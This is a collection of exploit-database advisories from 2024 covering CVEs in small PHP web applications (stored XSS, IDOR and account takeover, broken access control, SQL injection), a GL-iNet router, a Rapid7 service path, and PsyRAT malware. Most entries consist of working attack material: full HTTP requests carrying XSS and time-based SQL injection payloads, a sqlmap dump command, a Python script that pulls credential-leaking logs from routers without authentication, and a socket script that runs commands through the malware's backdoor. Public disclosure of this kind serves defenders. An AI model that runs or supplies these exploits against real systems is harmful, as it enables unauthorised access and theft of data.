<pre><code>#Vulnerability Details:<br />#Application Name: Computer Laboratory Management System<br />#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html<br />#Vendor Homepage: https://www.sourcecodester.com/users/tips23<br />#BuG: Insecure Direct Object References (IDOR) and Account Takeover<br />#BuG_Author: SoSPiro<br />#CVE: CVE-2024-3140<br /><br /># Vulnerable code section:<br /><br />foreach($_POST as $k => $v){<br /> $v = $this->conn->real_escape_string($v);<br /> if(in_array($k, $main_field)){<br /> if(!empty($data)) $data .= ", ";<br /> $data .= " `{$k}` = '{$v}' ";<br /> }<br />}<br /><br />- The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.<br /><br /># Vulnerability Description:<br /><br />- The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack.<br /><br /><br /># Proof of Concept (PoC):<br /><br />- Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing<br /><br /><br />- Request:<br /><br /><br />POST /php-lms/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571<br />Content-Length: 946<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/php-lms/admin/?page=user<br />Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />X-PwnFox-Color: green<br /><br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="id"<br /><br />8<br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="firstname"<br /><br />staff2<br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="middlename"<br /><br /><script>alert(1)</script><br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="lastname"<br /><br />asd<br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="username"<br /><br />staff<br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="password"<br /><br /><br />-----------------------------381104392340117332004262429571<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------381104392340117332004262429571--<br /><br />- In this POST request, an attacker has included a script tag in the "middlename" field:<br /><br /><script>alert(1)</script><br /><br />- When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application.<br /><br /><br /><br /># Impact:<br /><br />- The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users.<br /><br /><br /><br /># Reproduce:<br /><br />https://github.com/Sospiro014/zday1/blob/main/xss_1.md<br />https://vuldb.com/?id.258915<br />https://www.cve.org/CVERecord?id=CVE-2024-3140<br /><br /><br /><br /></code></pre>
<pre><code>#Vulnerability Details:<br />#Application Name: Computer Laboratory Management System<br />#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html<br />#Vendor Homepage: https://www.sourcecodester.com/users/tips23<br />#BuG: Insecure Direct Object References (IDOR) and Account Takeover<br />#BuG_Author: SoSPiro<br />#CVE: CVE-2024-3139<br /><br /># Vulnerable code section:<br /><br />if(!empty($_FILES['img']['tmp_name'])){<br /> if(!is_dir(base_app."uploads/avatars"))<br /> mkdir(base_app."uploads/avatars");<br /> $ext = pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION);<br /> $fname = "uploads/avatars/$id.png"; // The $id value is directly used in the file path<br /> // Rest of the code<br />}<br /><br /><br /># Vulnerability Description:<br /><br />This vulnerability exists in the section of code responsible for handling file uploads. The $id variable, obtained from user input ($_POST), is utilized directly in constructing the file path without appropriate validation or authorization checks, leading to both IDOR and account takeover vulnerabilities. This allows an attacker to manipulate the $id parameter to access and modify files of other users, including administrators.<br /><br /><br /><br /># Proof of Concept (PoC):<br /><br />- Poc Video : https://drive.google.com/file/d/1P0Vg_sYM9S43_rJTe1l5E2Vt9gzvb0YX/view?usp=sharing<br /><br /><br />- Request:<br /><br />POST /php-lms/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------38244968796537297751592545024<br />Content-Length: 8393<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/php-lms/admin/?page=user<br />Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />X-PwnFox-Color: green<br /><br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="id"<br /><br />7<br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="firstname"<br /><br />testtt<br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="middlename"<br /><br />testMiddle <br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="lastname"<br /><br />te Last Name <br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="username"<br /><br />admin2<br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="password"<br /><br />qwe123<br />-----------------------------38244968796537297751592545024<br />Content-Disposition: form-data; name="img"; filename="hack.png"<br />Content-Type: image/png<br /><br />PNG<br />...<br /><br />- Response:<br /><br /><br />HTTP/1.1 200 OK<br />Date: Mon, 01 Apr 2024 10:19:19 GMT<br />Server: Apache/2.4.54 (Win64) PHP/8.2.0 mod_fcgid/2.3.10-dev<br />X-Powered-By: PHP/8.2.0<br />X-Xdebug-Profile-Filename: c:/wamp64/tmp\trace.localhost.1711966759.10780.cgrind<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />1<br /><br /><br /># Impact:<br /><br />This vulnerability allows attackers to access and modify user data and profile pictures, leading to potential phishing, distribution of malicious content, and reputational damage. Additionally, unauthorized access to administrator accounts can occur, resulting in the compromise of sensitive information. This poses a significant risk to the security and usability of the application.<br /><br /><br /><br /># Reproduce:<br /><br />https://github.com/Sospiro014/zday1/blob/main/idor%2Baccaunt_takeover.md<br />https://vuldb.com/?id.258914<br />https://www.cve.org/CVERecord?id=CVE-2024-3139<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)<br /># Google Dork: NA<br /># Date: 28-03-2024<br /># Exploit Author: Sandeep Vishwakarma<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html<br /># Version: v1.0<br /># Tested on: Windows 10<br /># Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -<br />v1.0 allows an attacker to execute arbitrary code via a crafted payload to<br />the Firstname and lastname parameter in the profile component.<br /><br /># POC:<br />1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile<br />2. In fname & lname parameter add payolad<br />"><script>alert("Hacked_by_Sandy")</script><br />3. click on submit.<br /><br /># Reference:<br />https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download<br /># CVE: CVE-2024-27356<br /># Google Dork: intitle:"GL.iNet Admin Panel"<br /># Date: 2/26/2024<br /># Exploit Author: Bandar Alharbi (aggressor)<br /># Vendor Homepage: www.gl-inet.com<br /># Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin<br /># Tested Model: GL-X3000 Spitz AX<br /># Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md<br /><br />import sys<br />import requests<br />import json<br />requests.packages.urllib3.disable_warnings()<br />h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}<br /><br />def DoesTarExist():<br /> r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)<br /> if r.status_code == 200:<br /> f = open("logread.tar", "wb")<br /> f.write(r.content)<br /> f.close()<br /> print("[*] Full logs archive `logread.tar` has been downloaded!")<br /> print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")<br /> return True<br /> else:<br /> print("[*] The `logread.tar` archive does not exist however ... try again later!")<br /> return False<br /><br />def isVulnerable():<br /> r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)<br /> if r1.status_code == 500 and "nginx" in r1.text:<br /> r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)<br /> if "Admin-Token" in r2.text:<br /> j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}<br /> r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)<br /> ver = r3.json()['result']['firmware_version']<br /> model = r3.json()['result']['model']<br /> if ver.startswith(('4.')):<br /> print("[*] Firmware version (%s) is vulnerable!" %ver)<br /> print("[*] Device model is: %s" %model)<br /> return True<br /> print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")<br /> return False<br /><br />def isAlive():<br /> try:<br /> r = requests.get(url, verify=False, timeout=30, headers=h)<br /> if r.status_code != 200:<br /> print("[*] Make sure the target's web interface is accessible!")<br /> return False<br /> elif r.status_code == 200:<br /> print("[*] The target is reachable!")<br /> return True<br /> except Exception:<br /> print("[*] Error occurred when connecting to the target!")<br /> pass<br /> return False<br /><br />if __name__ == '__main__':<br /> if len(sys.argv) != 2:<br /> print("exploit.py url")<br /> sys.exit(0)<br /> url = sys.argv[1]<br /> url = url.lower()<br /> if not url.startswith(('http://', 'https://')):<br /> print("[*] Invalid url format! It should be http[s]://<domain or ip>")<br /> sys.exit(0)<br /> if url.endswith("/"):<br /> url = url.rstrip("/")<br /><br /> print("[*] GL.iNet Unauthenticated Full Logs Downloader")<br /><br /> try:<br /> if (isAlive() and isVulnerable()) == (True and True):<br /> DoesTarExist()<br /> except KeyboardInterrupt:<br /> print("[*] The exploit has been stopped by the user!")<br /> sys.exit(0)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path<br /># Date: 2024-04-2<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.rapid7.com/<br /># Software Link: https://www.rapid7.com/products/nexpose/<br /># Version: 6.6.240<br /># Tested: Windows 10 x64<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname<br /><br />DisplayName Name PathName StartMode StartName <br />Nexpose Security Console nexposeconsole "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" Auto LocalSystem<br /><br /># Service info:<br /><br />C:\Users\saudh>sc qc nexposeconsole<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: nexposeconsole<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Nexpose Security Console<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)<br /># Date: 2023-11-14<br /># Exploit Author: Ersin Erenler<br /># Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code<br /># Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip<br /># Version: 1.0<br /># Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0<br /># CVE : CVE-2023-46020<br /><br />-------------------------------------------------------------------------------<br /><br /># Description:<br /><br />The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.<br /><br />Vulnerable File: updateprofile.php<br /><br />Parameters: rename, remail, rphone, rcity<br /><br /># Proof of Concept:<br />----------------------<br /><br />1. Intercept the POST request to updateprofile.php via Burp Suite<br />2. Inject the payload to the vulnerable parameters<br />3. Payload: "><svg/onload=alert(document.domain)><br />4. Example request for rname parameter:<br /><br />---<br /><br />POST /bloodbank/file/updateprofile.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 103<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/bloodbank/rprofile.php?id=1<br />Cookie: PHPSESSID=<some-cookie-value><br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update<br /><br />----<br /><br />5. Go to the profile page and trigger the XSS<br /><br />XSS Payload:<br /><br />"><svg/onload=alert(document.domain)><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/0e6e40aad3e8d46e3c0c26ccc6ab94b3.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.ju (PSYRAT)<br />Vulnerability: Authentication Bypass RCE<br />Family: PSYRAT<br />Type: PE32<br />MD5: 0e6e40aad3e8d46e3c0c26ccc6ab94b3<br />Vuln ID: MVID-2024-0677<br />Disclosure: 04/01/2024<br /><br />Description: The PsyRAT 0.01 malware listens on random high TCP ports 53297, 53211, 532116 and so forth. Connecting to an infected host returns a logon prompt for PASS. However, you can enter anything or nothing at all and execute commands made available by the backdoor. The malware will return a BADPWD and or "Invalid command" error string but the command executes regardless. Custom client is required as it seems to dislike CRLF \r\n characters when using netcat or telnet.<br /><br />getdrives <br />C\ - Fixed Drive^D\ - CD-ROM^<br /><br />cpuinfo <br />Windows Version |System Directory C\WINDOWS\system32|Computer Name DESKTOP-2C4IQJO|Username VICTIM|CPU Speed 2808 MHz|CPU Type GenuineIntel|------|PsyRAT Version PsyRAT 1.02|IP/Port 192.168.18.130|Password |Install name |Reg value |PHP URL<br /><br />exe_sho [Program_Name] starts a program <br /><br />Exploit/PoC:<br />from socket import *<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=55116<br /><br />s=socket(AF_INET, SOCK_STREAM)<br />s.connect((MALWARE_HOST, PORT))<br /><br />#send bad password<br />PAYLOAD="malvuln" <br />s.send(PAYLOAD.encode())<br /><br />#call commands<br />PAYLOAD="exe_sho calc" <br />s.send(PAYLOAD.encode())<br /><br />s.close()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control<br /># Date: 2 Feb 2024<br /># Exploit Author: Yevhenii Butenko<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html<br /># Version: 1.0<br /># Tested on: Debian<br /># CVE : CVE-2024-24496<br /><br />### Broken Access Control:<br /><br />> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.<br /><br />### Affected Components:<br /><br />> home.php, add-tracker.php, delete-tracker.php, update-tracker.php<br /><br />### Description:<br /><br />> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.<br /><br />## Proof of Concept:<br /><br />### Unauthenticated Access to Home page<br /><br />> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.<br /><br />### Create Tracker as Unauthenticated User<br /><br />To create a tracker, use the following request:<br /><br />```<br />POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 108<br />Origin: http://localhost<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/habit-tracker/home.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes<br />```<br /><br />### Update Tracker as Unauthenticated User<br /><br />To update a tracker, use the following request:<br /><br />```<br />POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 121<br />Origin: http://localhost<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/habit-tracker/home.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes<br />```<br /><br />### Delete Tracker as Unauthenticated User:<br /><br />To delete a tracker, use the following request:<br /><br />```<br />GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/habit-tracker/home.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />```<br /><br />## Recommendations<br /><br />When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.<br /><br /></code></pre>
<pre><code># Exploit Title: Daily Habit Tracker 1.0 - SQL Injection<br /># Date: 2 Feb 2024<br /># Exploit Author: Yevhenii Butenko<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html<br /># Version: 1.0<br /># Tested on: Debian<br /># CVE : CVE-2024-24495<br /><br />### SQL Injection:<br /><br />> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.<br /><br />### Affected Components:<br /><br />> delete-tracker.php<br /><br />### Description:<br /><br />> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.<br /><br />## Proof of Concept:<br /><br />### Manual Exploitation<br /><br />The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:<br /><br />```<br />GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br />```<br /><br />![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)<br /><br />### SQLMap<br /><br />Save the following request to `delete_tracker.txt`:<br /><br />```<br />GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />DNT: 1<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: none<br />Sec-Fetch-User: ?1<br />```<br /><br />Use `sqlmap` with `-r` option to exploit the vulnerability:<br /><br />```<br />sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump<br />```<br /><br />## Recommendations<br /><br />When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.<br /><br /></code></pre>
<pre><code># Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)<br /># Date: 2 Feb 2024<br /># Exploit Author: Yevhenii Butenko<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html<br /># Version: 1.0<br /># Tested on: Debian<br /># CVE : CVE-2024-24494<br /><br />### Stored Cross-Site Scripting (XSS):<br /><br />> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.<br /><br />### Affected Components:<br /><br />> add-tracker.php, update-tracker.php<br /><br />Vulnerable parameters: <br />- day <br />- exercise <br />- pray <br />- read_book <br />- vitamins <br />- laundry <br />- alcohol <br />- meat<br /><br />### Description:<br /><br />> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.<br /><br />## Proof of Concept:<br /><br />The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.<br /><br />Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:<br /><br />```<br />POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 175<br />Origin: http://localhost<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/habit-tracker/home.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes<br />```<br /><br />![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true)<br /><br />## Recommendations<br /><br />When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.<br /><br /></code></pre>